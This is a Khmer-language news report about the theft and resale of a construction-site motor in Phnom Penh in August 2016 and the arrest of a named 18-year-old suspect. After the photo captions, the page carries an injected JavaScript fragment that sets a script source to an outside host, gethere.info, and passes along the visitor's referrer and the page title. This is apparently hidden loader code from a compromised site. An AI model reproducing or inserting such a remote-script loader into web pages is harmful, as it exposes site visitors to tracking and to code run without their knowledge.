លួចម៉ូទ័រយកទៅលក់នៅទួលទំពូងពេលមកវិញម្ចាស់ក្របួចអោយសមត្ថកិច្ចយកស្នាដៃ

ភ្នំពេញៈជនសង្ស័យម្នាក់ក្នុងចំនោមបក្សពួកមានគ្នា2នាក់ត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួនបន្ទាប់ពីបានធ្វើសកម្មភាព

លួចម៉ូទរ័យកទៅលក់។  ហេតុការណ៍ខាងលើនេះបានកើតឡើងកាលពីវេលាម៉ោង០៩និង២០នាទីព្រឹកថ្ងៃទី២៣ ខែសីហា ឆ្នាំ២០១៦ ស្ថិតនៅត្រង់ចំនុចការដ្ឋានសំណង់ក្នុងមន្ទីពេទ្យព្រះកុសមៈ(ហៅពេទ្យលោកសង្ឃ) ក្នុងសង្កាត់ទឹកល្អក់ទី២ ខណ្ឌទួលគោក។

 

ជនសង្ស័យដែសមត្ថកិច្ចឃាត់ខ្លួនខាងលើឈ្មោះឆាំង ឆៃ ភេទប្រុស អាយុ ១៨ឆ្នាំ មុខរបរ ពុំពិតប្រាកដ ស្នាក់នៅភូមិ កោះញ៉ៃ ឃុំសំរោង ស្រុកត្រាំកក់ ខេត្តតាកែវ ។ចំនែកជនសង្ស័យម្នាក់ទៀតពុំបានស្គាល់អត្តសញ្ញាណទេគេចខ្លួនបាត់ រីឯជនរងគ្រោះឈ្មោះសុខលី ហៅញ៉ាញ់ ភេទប្រុស អាយុ ៣៦ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ ជាងម៉ៅការសំណង់ ។

 

តាមប្រភពព័មានបានអោយដឹងថានៅមុនកើតហេតុជនរងគ្រោះបានអោយកូនជាងយកម៉ូទរ័ដែលឈប់ប្រើយកទៅទុកក្នុងបន្ទប់ដូចសព្វមួយដង លុះមកដល់វេលាកើតហេតុខាងលើស្រាប់តែ ជនសង្ស័យមានគ្នា០២នាក់បានចូលមកយក ម៉ូទ័រទៅបាត់ រហូតដល់ម៉ោងប្រហែល ១១និង១៥នាទី ដែលជាម៉ោងឈប់សំរាកជនរងគ្រោះបានមកមើលសម្ភារះបាត់ម៉ូទ័រមួយគ្រឿងដែលមានតំលៃ៤០០$ក៏ទៅឆែកមើលកាមេរ៉ាសុវត្ថភាពឃើញជនសង្ស័យនិងបក្សពួកចូលលួចក៏ដើរកមើលឃើញជនសង្ស័យឈ្មោះឆៃទើបត្រឡប់មកពីលក់វិញក៏ធ្វើការឃាត់ខ្លួនប្រគល់អោយសមត្ថកិច្ចប៉ុស្តិ៍ទឹកល្អក់២តែម្តង ។

 

តាមចំលើយសារភាពរបស់ជនសង្ស័យបានសារភាពថាខ្លួននិងបក្សពួកពិតជាបានលួចពិតប្រាកដមែនដោយយកទៅលក់នៅទួលទំពូងបានក្នុងតំលៃ២០$។ក្រោយពីទទួលបានចំលើយសារភាពពីជនសង្ស័យរួចសមត្ថកិច្ចបាននាំខ្លួនជនសង្ស័យទៅចង្អុលបង្ហាញកន្លែងទទួលផលចោរកម្មនៅទួលទំពូងដែលមានយីហោ ជាវ អី វី ដែលស្ថិតនៅចំនុចផ្លូវ១៦៣ កែងផ្លូវ៤០៨ ក្នុងសង្កាត់ទួលទំពូង២ ខណ្ឌចំការមន ហើយសមត្ថកិច្ចបានធ្វើការដកហូតយកម៉ូទ័រប្រគល់អោយជនរងគ្រោះវិញ។

 

បច្ចុប្បន្នជនសង្ស័យកំពុងឃាត់ខ្លួនជាបណ្តោះអាសន្ននៅប៉ុស្តិ៍ទឹកល្អក់២ ដើម្បីសាកសួរនិងកសាងសំណុំរឿងបញ្ជូនទៅអធិការដ្ឋាននគរបាលខណ្ឌទួលគោកចាត់ការបន្តតាមផ្លូវច្បាប់ ៕ដោយ៖ខេងប៊ុនធឿន

IMG-20160823-WA0175 IMG-20160823-WA0174 IMG-20160823-WA0172s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More